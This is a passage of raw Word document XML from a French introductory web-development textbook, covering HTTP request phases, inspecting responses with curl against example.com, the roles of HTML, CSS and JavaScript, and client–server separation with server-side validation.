                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>0 à 100 ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3966"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Nom mal orthographié, DNS indisponible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Connexion TCP + TLS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="234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20 à 200 ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="396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Port fermé, certificat invalide</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Requête et réponse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2344"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>50 ms à plusieurs secondes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3966"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Erreur serveur, page trop lourde</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Chargement des ressources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="234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variable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="396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Fichier introuvable, blocage réseau</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rendu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2344"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>16 ms par image idéalement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3966"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CSS ou script bloquant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La commande </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> permet d'observer la réponse brute, sans navigateur. C'est un outil précieux pour distinguer un problème de serveur d'un problème d'affichage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Inspecter une réponse HTTP en ligne de commande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curl -I https://example.com</w:t>
        <w:br/>
        <w:t>HTTP/2 200</w:t>
        <w:br/>
        <w:t>content-type: text/html; charset=UTF-8</w:t>
        <w:br/>
        <w:t>content-length: 1256</w:t>
        <w:br/>
        <w:t>last-modified: Thu, 17 Oct 2024 12:00:00 GMT</w:t>
        <w:br/>
        <w:br/>
        <w:t>$ curl -s https://example.com | head -n 5</w:t>
        <w:br/>
        <w:t>&lt;!doctype html&gt;</w:t>
        <w:br/>
        <w:t>&lt;html lang="en"&gt;</w:t>
        <w:br/>
        <w:t>&lt;head&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;title&gt;Example Domain&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>1.3 Les trois langages du front-end</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une interface web repose sur trois technologies complémentaires. Les confondre est la première source d'erreurs de débutant : on demande à HTML de mettre en page, à CSS de réagir à un clic, à JavaScript de décrire un contenu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.2 — Répartition des responsabilités entre les trois langages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12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Langage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="198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324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Question à laquelle il répond</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="252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Exemple</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1262"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HTML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1983"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Structure et sens</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3245"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Qu'est-ce que ce contenu ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2524"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;h1&gt;Titre&lt;/h1&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="126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CSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="198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Présentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="324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À quoi cela ressemble-t-il ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="252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h1 { color: navy }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1262"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>JavaScript</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1983"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Comportement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3245"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Que se passe-t-il ensuite ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2524"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>h1.hidden = true</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2857500"/>
            <wp:docPr id="5" name="Picture 5"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f03.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2857500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.3 — Trois couches, un seul document</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>1.3.1 HTML : le sens avant l'apparence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">HTML décrit la </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>nature</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> du contenu. Un titre de niveau 1 n'est pas « du texte en gros » : c'est le titre principal du document, ce que les moteurs de recherche, les lecteurs d'écran et les outils d'export utilisent pour comprendre la page. Un navigateur sans feuille de style doit rester lisible : c'est le meilleur test de qualité d'un document HTML.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>1.3.2 CSS : une feuille de style, pas un thème</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CSS associe des règles à des éléments. La même page peut être affichée sur un téléphone, imprimée, lue par un lecteur d'écran ou rendue en mode sombre sans que le HTML change. Cette séparation permet de maintenir un site entier en modifiant quelques fichiers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>1.3.3 JavaScript : le comportement, avec parcimonie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>JavaScript s'exécute dans le navigateur, dans un environnement isolé du système de fichiers. Il peut modifier la page, réagir aux actions de l'utilisateur et dialoguer avec un serveur. Une page doit néanmoins rester utile lorsque JavaScript est indisponible ou échoue : c'est le principe de l'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>amélioration progressive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</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NE PAS CONFONDRE HTML ET MISE EN FORME</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Écrire </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>&lt;h2&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> pour obtenir du texte plus petit est une erreur de sens. Utilisez la hiérarchie correcte des titres, puis ajustez la taille avec CSS. Un document dont la hiérarchie est fausse pénalise l'accessibilité et le référencement, même s'il « ressemble » à ce que vous vouliez.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>1.4 Client et serveur : qui fait quoi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est le programme qui demande et affiche : ici, le navigateur. Le </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>serveur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est le programme qui répond : il lit une requête, exécute éventuellement du code, puis renvoie une réponse. Cette séparation est fondamentale : tout ce qui est envoyé au client peut être lu, copié et modifié par l'utilisateur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2730500"/>
            <wp:docPr id="6" name="Picture 6"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f04.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2730500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.4 — Deux machines, deux responsabilités</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Conséquence pratique : une validation de formulaire côté client améliore le confort, mais elle ne remplace jamais une validation côté serveur. Un utilisateur peut désactiver JavaScript, modifier le HTML ou envoyer une requête forgée avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Cette règle reviendra au chapitre 35.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">On distingue deux grandes familles de sites. Les sites </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>statiques</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> servent des fichiers préparés à l'avance : rapides, simples, faciles à mettre en cache. Les sites </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>dynamiques</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> construisent la réponse à la demande, souvent à partir d'une base de données : personnalisation et fraîcheur, au prix d'une complexité supérieure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>1.5 Préparer son environnement de travail</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Quatre outils suffisent pour commencer : un éditeur de texte, un navigateur récent, un terminal et un dossier de travail organisé.</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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
